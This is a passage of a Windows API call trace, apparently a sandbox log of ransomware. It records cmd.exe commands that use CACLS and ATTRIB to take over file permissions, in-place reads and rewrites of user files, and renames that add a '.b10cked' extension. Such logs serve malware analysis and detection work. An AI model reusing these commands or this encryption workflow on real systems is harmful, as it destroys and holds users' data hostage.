lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa0c, dwThreadId=0xcf8)) returned 1 [0217.181] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0217.472] CloseHandle (hObject=0x120) returned 1 [0217.472] CloseHandle (hObject=0x1b4) returned 1 [0217.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.472] ReleaseMutex (hMutex=0xf8) returned 1 [0217.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.472] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.473] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.473] ReleaseMutex (hMutex=0xf8) returned 1 [0217.473] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27426244164) returned 1 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.473] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.474] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.475] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.475] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c500, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0217.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.476] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c500*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0217.476] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0217.477] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c500, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0217.477] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0217.477] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c500*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c500*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0217.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indexed Locations.search-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0217.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Indexed Locations.search-ms", cchWideChar=27, lpMultiByteStr=0x132f7bc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Indexed Locations.search-ms", lpUsedDefaultChar=0x0) returned 27 [0217.481] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8 [0217.481] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0217.481] CloseHandle (hObject=0x1b4) returned 1 [0217.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\INDEXE~1.SEA") returned 0x26 [0217.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0217.482] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa84, dwThreadId=0xf54)) returned 1 [0217.488] CloseHandle (hObject=0x120) returned 1 [0217.489] CloseHandle (hObject=0x1b4) returned 1 [0217.489] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.492] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.492] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount2=26) returned 2 [0217.492] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.492] ReleaseMutex (hMutex=0xf8) returned 1 [0217.492] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.493] ReleaseMutex (hMutex=0xf8) returned 1 [0217.493] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0217.494] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27428411629) returned 1 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.495] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.499] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0217.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x10636 [0217.500] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10b1e [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10b1e [0217.537] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0217.537] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.537] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0217.538] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0217.538] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0217.538] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0217.538] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0217.539] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0217.539] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0217.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0217.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x13286a4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0217.545] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10b1e [0217.545] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0217.545] CloseHandle (hObject=0x1b4) returned 1 [0217.547] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON") returned 0x26 [0217.547] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.547] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" 